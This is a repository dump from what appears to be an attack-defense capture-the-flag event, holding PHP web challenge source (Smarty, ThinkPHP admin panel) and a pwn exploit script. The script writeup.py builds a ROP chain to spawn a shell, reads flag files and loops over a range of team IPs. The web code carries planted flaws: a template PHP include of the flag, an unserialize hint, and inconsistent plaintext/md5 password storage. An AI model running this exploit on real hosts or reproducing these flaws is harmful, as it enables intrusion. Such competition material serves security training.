65 | } 66 | } 67 | 68 | /** 69 | * modify resource_name according to resource handlers specifications 70 | * 71 | * @param Smarty $smarty Smarty instance 72 | * @param string $resource_name resource_name to make unique 73 | * @param boolean $isConfig flag for config resource 74 | * 75 | * @return string unique resource name 76 | */ 77 | public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false) 78 | { 79 | return get_class($this) . '#' . $resource_name; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_resource_recompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 37 | $compiled->timestamp = false; 38 | $compiled->exists = false; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_resource_uncompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 45 | $compiled->timestamp = false; 46 | $compiled->exists = false; 47 | } 48 | 49 | /** 50 | * render compiled template code 51 | * 52 | * @param Smarty_Internal_Template $_template 53 | * 54 | * @return string 55 | * @throws Exception 56 | */ 57 | public function render($_template) 58 | { 59 | $level = ob_get_level(); 60 | ob_start(); 61 | try { 62 | $this->renderUncompiled($_template->source, $_template); 63 | return ob_get_clean(); 64 | } 65 | catch (Exception $e) { 66 | while (ob_get_level() > $level) { 67 | ob_end_clean(); 68 | } 69 | throw $e; 70 | } 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_undefined_variable.php: -------------------------------------------------------------------------------- 1 | value = $value; 41 | $this->nocache = $nocache; 42 | $this->scope = $scope; 43 | } 44 | 45 | /** 46 | * <> String conversion 47 | * 48 | * @return string 49 | */ 50 | public function __toString() 51 | { 52 | return (string) $this->value; 53 | } 54 | } 55 | 56 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smartycompilerexception.php: -------------------------------------------------------------------------------- 1 | Smarty Compiler: ' . $this->message . ' <-- '; 13 | } 14 | 15 | /** 16 | * The line number of the template error 17 | * 18 | * @type int|null 19 | */ 20 | public $line = null; 21 | /** 22 | * The template source snippet relating to the error 23 | * 24 | * @type string|null 25 | */ 26 | public $source = null; 27 | /** 28 | * The raw text of the error message 29 | * 30 | * @type string|null 31 | */ 32 | public $desc = null; 33 | /** 34 | * The resource identifier or template name 35 | * 36 | * @type string|null 37 | */ 38 | public $template = null; 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smartyexception.php: -------------------------------------------------------------------------------- 1 | Smarty: ' . (self::$escape ? htmlentities($this->message) : $this->message) . ' <-- '; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /easyWEB/web1/html/public/css/reset.css: -------------------------------------------------------------------------------- 1 | @charset "utf-8"; 2 | /* CSS Document */ 3 | /*Reset*/ 4 | *{box-sizing:content-box;} 5 | a:hover, a:focus{text-decoration:none;} 6 | body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;} 7 | table{border-collapse:collapse;border-spacing:0;} 8 | body{-webkit-text-size-adjust:none;} 9 | fieldset,img{border:0;} 10 | img{ vertical-align: top; max-width: 100%; } 11 | address,caption,cite,code,dfn,em,th,var{font-style:normal;font-weight:normal;} 12 | ol,ul{list-style:none;} 13 | caption,th{text-align:left;} 14 | h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;} 15 | q:before,q:after{content:'';} 16 | abbr,acronym {border:0;} 17 | .clearfix:after{visibility:hidden;display: block;font-size:0;content:" ";clear:both;height:0;} 18 | * html .clearfix{ zoom: 1; } /* IE6 */ 19 | *:first-child+html .clearfix { zoom: 1; } /* IE7 */ 20 | .cli{ clear:both; font-size:0; height:0; overflow:hidden;display:block;} 21 | .lclear{clear:left;font-size:0;height:0;overflow:hidden;} 22 | .fl{float:left;} 23 | .fr{float:right;} 24 | body{font-size:12px;font-family:'微软雅黑',"宋体","Arial Narrow",Helvetica,sans-serif;color:#000;line-height:1.2;text-align:left;} 25 | a{color:#333;text-decoration:none;} 26 | -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/background.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/background.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/bg.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/big.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/big.jpg -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/name.png -------------------------------------------------------------------------------- /easyWEB/web1/html/public/image/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/web1/html/public/image/password.png -------------------------------------------------------------------------------- /easyWEB/web1/html/public/js/app.js: -------------------------------------------------------------------------------- 1 | /* ----------------------------------------------- 2 | /* How to use? : Check the GitHub README 3 | /* ----------------------------------------------- */ 4 | 5 | /* To load a config file (particles.json) you need to host this demo (MAMP/WAMP/local)... */ 6 | /* 7 | particlesJS.load('particles-js', 'particles.json', function() { 8 | console.log('particles.js loaded - callback'); 9 | }); 10 | */ 11 | 12 | /* Otherwise just put the config content (json): */ 13 | 14 | particlesJS('particles-js', 15 | 16 | { 17 | "particles": { 18 | "number": { 19 | "value": 40, 20 | "density": { 21 | "enable": true, 22 | "value_area": 800 23 | } 24 | }, 25 | "color": { 26 | "value": "#ffffff" 27 | }, 28 | "shape": { 29 | "type": "circle", 30 | "stroke": { 31 | "width": 0, 32 | "color": "#000000" 33 | }, 34 | "polygon": { 35 | "nb_sides": 5 36 | }, 37 | "image": { 38 | "src": "img/github.svg", 39 | "width": 100, 40 | "height": 100 41 | } 42 | }, 43 | "opacity": { 44 | "value": 0.7, 45 | "random": false, 46 | "anim": { 47 | "enable": false, 48 | "speed": 1, 49 | "opacity_min": 0.1, 50 | "sync": false 51 | } 52 | }, 53 | "size": { 54 | "value": 3, 55 | "random": true, 56 | "anim": { 57 | "enable": false, 58 | "speed": 40, 59 | "size_min": 0.1, 60 | "sync": false 61 | } 62 | }, 63 | "line_linked": { 64 | "enable": true, 65 | "distance": 150, 66 | "color": "#ffffff", 67 | "opacity": 0.6, 68 | "width": 1 69 | }, 70 | "move": { 71 | "enable": true, 72 | "speed": 6, 73 | "direction": "none", 74 | "random": false, 75 | "straight": false, 76 | "out_mode": "out", 77 | "bounce": false, 78 | "attract": { 79 | "enable": false, 80 | "rotateX": 600, 81 | "rotateY": 1200 82 | } 83 | } 84 | }, 85 | "interactivity": { 86 | "detect_on": "canvas", 87 | "events": { 88 | "onhover": { 89 | "enable": true, 90 | "mode": "grab" 91 | }, 92 | "onclick": { 93 | "enable": true, 94 | "mode": "push" 95 | }, 96 | "resize": true 97 | }, 98 | "modes": { 99 | "grab": { 100 | "distance": 200, 101 | "line_linked": { 102 | "opacity": 1 103 | } 104 | }, 105 | "bubble": { 106 | "distance": 400, 107 | "size": 40, 108 | "duration": 2, 109 | "opacity": 8, 110 | "speed": 3 111 | }, 112 | "repulse": { 113 | "distance": 200, 114 | "duration": 0.4 115 | }, 116 | "push": { 117 | "particles_nb": 4 118 | }, 119 | "remove": { 120 | "particles_nb": 2 121 | } 122 | } 123 | }, 124 | "retina_detect": false 125 | } 126 | 127 | ); -------------------------------------------------------------------------------- /easyWEB/web1/html/public/js/npm.js: -------------------------------------------------------------------------------- 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment. 2 | require('../../js/transition.js') 3 | require('../../js/alert.js') 4 | require('../../js/button.js') 5 | require('../../js/carousel.js') 6 | require('../../js/collapse.js') 7 | require('../../js/dropdown.js') 8 | require('../../js/modal.js') 9 | require('../../js/tooltip.js') 10 | require('../../js/popover.js') 11 | require('../../js/scrollspy.js') 12 | require('../../js/tab.js') 13 | require('../../js/affix.js') -------------------------------------------------------------------------------- /easyWEB/web1/html/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | nodaemon=true 3 | 4 | [rpcinterface:supervisor] 5 | supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface 6 | 7 | [unix_http_server] 8 | file=/tmp/supervisor.sock 9 | 10 | [supervisorctl] 11 | serverurl=unix:///tmp/supervisor.sock 12 | 13 | [program:apache2] 14 | command=/bin/bash -c "source /etc/apache2/envvars && exec /usr/sbin/apache2 -DFOREGROUND" 15 | 16 | [program:mysql] 17 | command = /usr/bin/mysqld_safe 18 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/error.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 星球管理系统 9 | 10 | 11 | 12 | 13 | 22 | 23 | 24 |
25 | 26 | Warning! Something wrong,check again! 27 |
28 | 29 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/success.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 星球管理系统 9 | 10 | 11 | 12 | 13 | 22 | 23 | 24 |
25 | 26 | successful!your oprating is ok! 27 |
28 | 29 | -------------------------------------------------------------------------------- /easyWEB/web1/html/templates/updatepass.tpl: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 学生会-简历系统 9 | 10 | 11 | 12 | 13 | 55 | 56 | 57 | 64 | 65 | -------------------------------------------------------------------------------- /easyWEB/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/easyWEB/writeup.pdf -------------------------------------------------------------------------------- /pwn/calculator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/pwn/calculator -------------------------------------------------------------------------------- /pwn/calculator.bak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/pwn/calculator.bak -------------------------------------------------------------------------------- /pwn/writeup.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import requests 3 | import time 4 | import re 5 | 6 | 7 | def main(ip): 8 | p=remote(ip,10000) 9 | 10 | elf=ELF('./calculator') 11 | 12 | system_addr=elf.symbols['system'] 13 | binsh_addr=0x006020A0 14 | poprdi=0x00400ec3 15 | poprsi=0x400ec1 16 | frmst_addr=0x400FD2 17 | scanf_plt=elf.symbols['__isoc99_scanf'] 18 | #context.log_level='debug' 19 | def fillchar(payload): 20 | p.recvuntil('operation:\n\n') 21 | p.sendline('1') 22 | p.recvuntil('x:\n') 23 | p.sendline(str(payload)) 24 | p.recvuntil('y:\n') 25 | p.sendline('0') 26 | 27 | def sendpayload(payload): 28 | p.recvuntil('operation:\n\n') 29 | p.sendline('1') 30 | p.recvuntil('x:\n') 31 | p.sendline(str(payload)) 32 | p.recvuntil('y:\n') 33 | p.sendline('0') 34 | p.recvuntil('operation:\n\n') 35 | p.sendline('1') 36 | p.recvuntil('x:\n') 37 | p.sendline('0') 38 | p.recvuntil('y:\n') 39 | p.sendline('0') 40 | 41 | 42 | def savepayload(): 43 | p.recvuntil('operation:\n\n') 44 | p.sendline('5') 45 | 46 | 47 | def exp(): 48 | p.recvuntil('calculations:') 49 | p.sendline(str(100)) 50 | for i in range(62): 51 | fillchar(0) 52 | 53 | 54 | #sendpayload(0x400a1f) 55 | #gdb.attach(p) 56 | exp() 57 | sendpayload(poprdi) 58 | sendpayload(frmst_addr) 59 | sendpayload(poprsi) 60 | sendpayload(binsh_addr) 61 | sendpayload(0) 62 | #0.&a.shu 63 | sendpayload(scanf_plt) 64 | 65 | sendpayload(poprdi) 66 | sendpayload(binsh_addr) 67 | sendpayload(system_addr) 68 | savepayload() 69 | 70 | binsh='sh'+'\x00' 71 | print len(binsh) 72 | binsh=binsh.ljust(8,'\x00') 73 | print len(binsh) 74 | dudu=u64(binsh) 75 | 76 | p.send(str(dudu)) 77 | 78 | p.sendline('\n') 79 | p.sendline('cat /flag.txt') 80 | flag=p.recv() 81 | return flag 82 | 83 | p.close() 84 | 85 | 86 | for i in range(101,125): 87 | try: 88 | ip='172.20.{}.101'.format(str(i)) 89 | flag=main(ip) 90 | print ip,flag 91 | time.sleep(11) 92 | except: 93 | print 'wrong' -------------------------------------------------------------------------------- /thinkPHP/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | composer.lock 3 | *.log 4 | thinkphp 5 | -------------------------------------------------------------------------------- /thinkPHP/LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | ThinkPHP遵循Apache2开源协议发布,并提供免费使用。 3 | 版权所有Copyright © 2006-2016 by ThinkPHP (http://thinkphp.cn) 4 | All rights reserved。 5 | ThinkPHP® 商标和著作权所有者为上海顶想信息科技有限公司。 6 | 7 | Apache Licence是著名的非盈利开源组织Apache采用的协议。 8 | 该协议和BSD类似,鼓励代码共享和尊重原作者的著作权, 9 | 允许代码修改,再作为开源或商业软件发布。需要满足 10 | 的条件: 11 | 1. 需要给代码的用户一份Apache Licence ; 12 | 2. 如果你修改了代码,需要在被修改的文件中说明; 13 | 3. 在延伸的代码中(修改和有源代码衍生的代码中)需要 14 | 带有原来代码中的协议,商标,专利声明和其他原来作者规 15 | 定需要包含的说明; 16 | 4. 如果再发布的产品中包含一个Notice文件,则在Notice文 17 | 件中需要带有本协议内容。你可以在Notice中增加自己的 18 | 许可,但不可以表现为对Apache Licence构成更改。 19 | 具体的协议参考:http://www.apache.org/licenses/LICENSE-2.0 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 22 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 23 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 24 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 25 | COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 26 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 27 | BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 28 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 29 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 30 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN 31 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 32 | POSSIBILITY OF SUCH DAMAGE. 33 | -------------------------------------------------------------------------------- /thinkPHP/application/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all -------------------------------------------------------------------------------- /thinkPHP/application/admin/config.php: -------------------------------------------------------------------------------- 1 | [ 5 | '__PUBLIC__'=>SITE_URL.'/static/admin', 6 | '__IMG__'=>SITE_URL.'/static', 7 | ], 8 | 9 | 'template' => [ 10 | // 模板后缀 11 | 'view_suffix' => 'htm', 12 | ], 13 | 14 | 15 | 16 | ]; 17 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Admin.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 13 | return $this->fetch(); 14 | } 15 | 16 | public function add() 17 | { 18 | if(request()->isPost()){ 19 | 20 | $data=[ 21 | 'username'=>input('username'), 22 | 'password'=>input('password'), 23 | ]; 24 | $validate = \think\Loader::validate('Admin'); 25 | if(!$validate->scene('add')->check($data)){ 26 | $this->error($validate->getError()); die; 27 | } 28 | if(db('admin')->insert($data)){ 29 | return $this->success('添加管理员成功!','lst'); 30 | }else{ 31 | return $this->error('添加管理员失败!'); 32 | } 33 | return; 34 | } 35 | return $this->fetch(); 36 | } 37 | 38 | public function edit(){ 39 | $id=input('id'); 40 | $admins=db('admin')->find($id); 41 | if(request()->isPost()){ 42 | $data=[ 43 | 'id'=>input('id'), 44 | 'username'=>input('username'), 45 | ]; 46 | if(input('password')){ 47 | $data['password']=md5(input('password')); 48 | }else{ 49 | $data['password']=$admins['password']; 50 | } 51 | $validate = \think\Loader::validate('Admin'); 52 | if(!$validate->scene('edit')->check($data)){ 53 | $this->error($validate->getError()); die; 54 | } 55 | $save=db('admin')->update($data); 56 | if($save !== false){ 57 | $this->success('修改管理员成功!','lst'); 58 | }else{ 59 | $this->error('修改管理员失败!'); 60 | } 61 | return; 62 | } 63 | $this->assign('admins',$admins); 64 | return $this->fetch(); 65 | } 66 | 67 | public function del(){ 68 | $id=input('id'); 69 | if($id != 2){ 70 | if(db('admin')->delete(input('id'))){ 71 | $this->success('删除管理员成功!','lst'); 72 | }else{ 73 | $this->error('删除管理员失败!'); 74 | } 75 | }else{ 76 | $this->error('初始化管理员不能删除!'); 77 | } 78 | 79 | } 80 | 81 | public function logout(){ 82 | session(null); 83 | $this->success('退出成功!','Login/index'); 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Base.php: -------------------------------------------------------------------------------- 1 | error('请先登录系统!','Login/index'); 9 | } 10 | } 11 | } -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Cate.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 11 | return $this->fetch(); 12 | } 13 | 14 | public function add() 15 | { 16 | if(request()->isPost()){ 17 | 18 | $data=[ 19 | 'catename'=>input('catename'), 20 | ]; 21 | $validate = \think\Loader::validate('Cate'); 22 | if(!$validate->scene('add')->check($data)){ 23 | $this->error($validate->getError()); die; 24 | } 25 | if(db('cate')->insert($data)){ 26 | return $this->success('添加栏目成功!','lst'); 27 | }else{ 28 | return $this->error('添加栏目失败!'); 29 | } 30 | return; 31 | } 32 | return $this->fetch(); 33 | } 34 | 35 | public function edit(){ 36 | $id=input('id'); 37 | $cates=db('cate')->find($id); 38 | if(request()->isPost()){ 39 | $data=[ 40 | 'id'=>input('id'), 41 | 'catename'=>input('catename'), 42 | ]; 43 | $validate = \think\Loader::validate('cate'); 44 | if(!$validate->scene('edit')->check($data)){ 45 | $this->error($validate->getError()); die; 46 | } 47 | $save=db('cate')->update($data); 48 | if($save !== false){ 49 | $this->success('修改栏目成功!','lst'); 50 | }else{ 51 | $this->error('修改栏目失败!'); 52 | } 53 | return; 54 | } 55 | $this->assign('cates',$cates); 56 | return $this->fetch(); 57 | } 58 | 59 | public function del(){ 60 | $id=input('id'); 61 | if($id != 2){ 62 | if(db('cate')->delete(input('id'))){ 63 | $this->success('删除栏目成功!','lst'); 64 | }else{ 65 | $this->error('删除栏目失败!'); 66 | } 67 | }else{ 68 | $this->error('初始化栏目不能删除!'); 69 | } 70 | 71 | } 72 | 73 | 74 | 75 | } 76 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Index.php: -------------------------------------------------------------------------------- 1 | fetch(); 11 | } 12 | 13 | 14 | 15 | } 16 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Links.php: -------------------------------------------------------------------------------- 1 | assign('list',$list); 11 | return $this->fetch(); 12 | } 13 | 14 | public function add() 15 | { 16 | if(request()->isPost()){ 17 | 18 | $data=[ 19 | 'title'=>input('title'), 20 | 'url'=>input('url'), 21 | 'desc'=>input('desc'), 22 | ]; 23 | $validate = \think\Loader::validate('Links'); 24 | if(!$validate->scene('add')->check($data)){ 25 | $this->error($validate->getError()); die; 26 | } 27 | if(db('Links')->insert($data)){ 28 | return $this->success('添加链接成功!','lst'); 29 | }else{ 30 | return $this->error('添加链接失败!'); 31 | } 32 | return; 33 | } 34 | return $this->fetch(); 35 | } 36 | 37 | public function edit(){ 38 | $id=input('id'); 39 | $Links=db('Links')->find($id); 40 | if(request()->isPost()){ 41 | $data=[ 42 | 'id'=>input('id'), 43 | 'title'=>input('title'), 44 | 'url'=>input('url'), 45 | 'desc'=>input('desc'), 46 | ]; 47 | $validate = \think\Loader::validate('Links'); 48 | if(!$validate->scene('edit')->check($data)){ 49 | $this->error($validate->getError()); die; 50 | } 51 | if(db('Links')->update($data)){ 52 | $this->success('修改链接成功!','lst'); 53 | }else{ 54 | $this->error('修改链接失败!'); 55 | } 56 | return; 57 | } 58 | $this->assign('Links',$Links); 59 | return $this->fetch(); 60 | } 61 | 62 | public function del(){ 63 | $id=input('id'); 64 | if(db('Links')->delete(input('id'))){ 65 | $this->success('删除链接成功!','lst'); 66 | }else{ 67 | $this->error('删除链接失败!'); 68 | } 69 | 70 | } 71 | 72 | 73 | 74 | } 75 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/controller/Login.php: -------------------------------------------------------------------------------- 1 | isPost()){ 10 | $admin=new Admin(); 11 | $data=input('post.'); 12 | $num=$admin->login($data); 13 | if($num==3){ 14 | $this->success('信息正确,正在为您跳转...','index/index'); 15 | }elseif($num==4){ 16 | $this->error('验证码错误'); 17 | } 18 | else{ 19 | $this->error('用户名或者密码错误'); 20 | } 21 | 22 | } 23 | return $this->fetch('login'); 24 | } 25 | 26 | 27 | 28 | 29 | 30 | } 31 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Admin.php: -------------------------------------------------------------------------------- 1 | check($data['code'])) { 11 | return 4; 12 | } 13 | $user=Db::name('admin')->where('username','=',$data['username'])->find(); 14 | if($user){ 15 | if($user['password'] == md5($data['password'])){ 16 | session('username',$user['username']); 17 | session('uid',$user['id']); 18 | return 3; //信息正确 19 | }else{ 20 | return 2; //密码错误 21 | } 22 | }else{ 23 | return 1; //用户不存在 24 | } 25 | } 26 | 27 | } 28 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Article.php: -------------------------------------------------------------------------------- 1 | belongsTo('cate','cateid'); 9 | } 10 | 11 | 12 | 13 | } 14 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/model/Cate.php: -------------------------------------------------------------------------------- 1 | 'require|max:25|unique:admin', 8 | 'password' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 'username.require' => '管理员名称必须填写', 13 | 'username.max' => '管理员名称长度不得大于25位', 14 | 'username.unique' => '管理员名称不得重复', 15 | 'password.require' => '管理员密码必须填写', 16 | 17 | ]; 18 | 19 | protected $scene = [ 20 | 'add' => ['username'=>'require|unique:admin','password'], 21 | 'edit' => ['username'=>'require|unique:admin'], 22 | ]; 23 | 24 | 25 | 26 | 27 | } 28 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Article.php: -------------------------------------------------------------------------------- 1 | 'require|max:25', 8 | 'cateid' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 'title.require' => '文章标题必须填写', 13 | 'title.max' => '文章标题长度不得大于25位', 14 | 'cateid.require' => '请选择文章所属栏目', 15 | 16 | ]; 17 | 18 | protected $scene = [ 19 | 'add' => ['title','cateid'], 20 | 'edit' => ['title','cateid'], 21 | ]; 22 | 23 | 24 | 25 | 26 | } 27 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Cate.php: -------------------------------------------------------------------------------- 1 | 'require|max:25|unique:cate', 8 | ]; 9 | 10 | protected $message = [ 11 | 'catename.require' => '栏目名称必须填写', 12 | 'catename.max' => '栏目名称长度不得大于25位', 13 | 'catename.unique' => '栏目名称不得重复', 14 | 15 | ]; 16 | 17 | protected $scene = [ 18 | 'add' => ['catename'=>'require|unique:cate'], 19 | 'edit' => ['catename'=>'require|unique:cate'], 20 | ]; 21 | 22 | 23 | 24 | 25 | } 26 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Links.php: -------------------------------------------------------------------------------- 1 | 'require|max:25', 8 | 'url' => 'require', 9 | ]; 10 | 11 | protected $message = [ 12 | 'title.require' => '链接标题必须填写', 13 | 'title.max' => '链接标题长度不得大于25位', 14 | 'url.require' => '链接地址必须填写', 15 | 16 | ]; 17 | 18 | protected $scene = [ 19 | 'add' => ['title','url'], 20 | 'edit' => ['title','url'], 21 | ]; 22 | 23 | 24 | 25 | 26 | } 27 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/validate/Tags.php: -------------------------------------------------------------------------------- 1 | 'require|max:25|unique:tags', 8 | ]; 9 | 10 | protected $message = [ 11 | 'tagname.require' => 'Tag标签必须填写', 12 | 'tagname.max' => 'Tag标签长度不得大于25位', 13 | 'tagname.unique' => 'Tag标签不得重复', 14 | 15 | ]; 16 | 17 | protected $scene = [ 18 | 'add' => ['tagname'], 19 | 'edit' => ['tagname'], 20 | ]; 21 | 22 | 23 | 24 | 25 | } 26 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/view/index/index.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | {include file="common/top"} 24 | 25 | 26 |
27 |
28 | 29 | {include file="common/left"} 30 | 31 | 32 |
33 | 34 |
35 |
    36 |
  • 控制面板
    • 37 | {php}@include('/flag');{/php} 38 |
39 |
40 | 41 | 42 | 43 |
44 | 45 | 46 |
47 | 48 |
49 | 50 |
51 |
52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /thinkPHP/application/admin/view/login/login.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /thinkPHP/application/command.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return []; -------------------------------------------------------------------------------- /thinkPHP/application/common.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用公共文件 13 | -------------------------------------------------------------------------------- /thinkPHP/application/database.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 数据库类型 14 | 'type' => 'mysql', 15 | // 服务器地址 16 | 'hostname' => '127.0.0.1', 17 | // 数据库名 18 | 'database' => 'blog', 19 | // 用户名 20 | 'username' => 'root', 21 | // 密码 22 | 'password' => '', 23 | // 端口 24 | 'hostport' => '', 25 | // 连接dsn 26 | 'dsn' => '', 27 | // 数据库连接参数 28 | 'params' => [], 29 | // 数据库编码默认采用utf8 30 | 'charset' => 'utf8', 31 | // 数据库表前缀 32 | 'prefix' => 'tp_', 33 | // 数据库调试模式 34 | 'debug' => true, 35 | // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器) 36 | 'deploy' => 0, 37 | // 数据库读写是否分离 主从式有效 38 | 'rw_separate' => false, 39 | // 读写分离后 主服务器数量 40 | 'master_num' => 1, 41 | // 指定从服务器序号 42 | 'slave_no' => '', 43 | // 是否严格检查字段是否存在 44 | 'fields_strict' => true, 45 | // 数据集返回类型 array 数组 collection Collection对象 46 | 'resultset_type' => 'array', 47 | // 是否自动写入时间戳字段 48 | 'auto_timestamp' => false, 49 | // 是否需要进行SQL性能分析 50 | 'sql_explain' => false, 51 | ]; 52 | -------------------------------------------------------------------------------- /thinkPHP/application/index/common.php: -------------------------------------------------------------------------------- 1 | $v) { 5 | $v=join(',',$v); 6 | $temp[]=$v; 7 | } 8 | if($temp){ 9 | $temp=array_unique($temp); 10 | foreach ($temp as $k=>$v) { 11 | $temp[$k]=explode(',', $v); 12 | } 13 | 14 | return $temp; 15 | } 16 | 17 | 18 | } 19 | -------------------------------------------------------------------------------- /thinkPHP/application/index/config.php: -------------------------------------------------------------------------------- 1 | [ 4 | '__PUBLIC__'=>SITE_URL.'/static/index', 5 | '__IMG__'=>SITE_URL.'/static', 6 | ], 7 | ]; 8 | -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Article.php: -------------------------------------------------------------------------------- 1 | find($arid); 13 | $ralateres=$this->ralat($articles['keywords'],$articles['id']); 14 | // dump($ralateres); die; 15 | db('article')->where('id','=',$arid)->setInc('click'); 16 | $cates=db('cate')->find($articles['cateid']); 17 | $recres=db('article')->where(array('cateid'=>$cates['id'],'state'=>1))->limit(8)->select(); 18 | $this->assign(array( 19 | 'articles'=>$articles, 20 | 'cates'=>$cates, 21 | 'recres'=>$recres, 22 | 'ralateres'=>$ralateres 23 | )); 24 | return $this->fetch('article'); 25 | } 26 | 27 | 28 | public function ralat($keywords,$id){ 29 | $arr=explode(',', $keywords); 30 | static $ralateres=array(); 31 | foreach ($arr as $k=>$v) { 32 | $map['keywords']=['like','%'.$v.'%']; 33 | $map['id']=['neq',$id]; 34 | $artres=db('article')->where($map)->order('id desc')->limit(8)->select(); 35 | $ralateres=array_merge($ralateres,$artres); 36 | } 37 | if($ralateres){ 38 | 39 | $ralateres=arr_unique($ralateres); 40 | 41 | return $ralateres; 42 | 43 | } 44 | 45 | } 46 | 47 | } 48 | //unserialize(Request::instance()->param('name')); -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Base.php: -------------------------------------------------------------------------------- 1 | right(); 11 | $cateres=db('cate')->order('id 